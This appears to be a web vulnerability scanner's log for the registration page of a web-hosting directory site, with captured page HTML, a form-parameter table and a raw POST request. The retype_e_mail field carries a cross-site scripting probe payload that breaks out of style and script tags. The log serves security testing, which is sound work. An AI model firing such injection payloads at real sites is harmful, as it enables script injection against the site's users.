HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table 
border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE356073CE74F460947B31D6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE356073FEC27D16BB4413076F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE3560731F4B14D3FF49CD55C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073AE90F0627E070188C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073B122FF71CF03FB3C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073B2321D272A2F09CBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE356073250F91A63ACFAA1AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE3560735E39EF44A02EBCD46F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE35607353DEAD80456A3DC9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073CCF0C23832F881EC6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> 
<option value='325A5101EE356073160FDBBFD85486ACC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE3560737DC3A9501319989EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE35607382BA6BCC4F827E97C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073F68A5FFA886EBF8DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE35607350372E7016BFB658C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE35607387F0482BA0440F5BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE35607387413FE2071809846F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE35607359E5AFF71BCC34636F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE35607360C74C429EBDCD3B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter | Type | Value
account_type | POST | 1
address | POST | 3
address2 | POST | 3
B1 | POST | Create An Account!
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | 3
bill_country | POST | 240
bill_phone | POST | 3
bill_province | POST | 3
bill_state | POST | 3
bill_zip | POST | 3
card_number | POST | 3
card_type | POST | 1
city | POST | 3
company_name | POST | Smith
copy_from_cont | POST | 1
country | POST | 240
deposit | POST | 3
e_mail | POST | netsparker@example.com
expire_date | POST | 3
first_name | POST | Smith
last_name | POST | Smith
owner_first_name | POST | Smith
owner_last_name | POST | Smith
password | POST | 3
phone | POST | 3
promo_code | POST | 3
province | POST | 3
retype_e_mail | POST | '"--></style></script><script>alert(0x001CF7)</script>
retype_password | POST | 3
state | POST | 3
zip | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 560
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CF7)%3c%2fscript%3e&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table 
border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE3560732400868C6EFB03CFC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE3560736D4039A680C647D16F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE3560738D6757CD93819AD9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073945F4B4A67A0F7F9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE35607382817836A7C5E2A36F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073E9D2E51936579955C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE356073276B7EC4A70EDB5AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073A728FB7C9EE9F5316F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073F61C701439D4B677C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073549DCF982B336CE26F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> 
<option value='325A5101EE356073AC50F26604A970C5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE35607396AA1FC105019A8DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE35607365797FDCD08390C3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE35607370D441A688D8622DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE356073A1EFAE474B59B836C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073AFC128C0687DD285C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE3560732DDDF11256DA73686F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073136053939482E1116F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073F27FC830A245DDDD6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter | Type | Value
account_type | POST | 1
address | POST | 3
address2 | POST | 3
B1 | POST | Create An Account!
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | 3
bill_country | POST | 240
bill_phone | POST | 3
bill_province | POST | 3
bill_state | POST | 3
bill_zip | POST | 3
card_number | POST | 3
card_type | POST | 1
city | POST | 3
company_name | POST | Smith
copy_from_cont | POST | 1
country | POST | 240
deposit | POST | 3
e_mail | POST | netsparker@example.com
expire_date | POST | 3
first_name | POST | Smith
last_name | POST | Smith
owner_first_name | POST | Smith
owner_last_name | POST | Smith
password | POST | 3
phone | POST | 3
promo_code | POST | 3
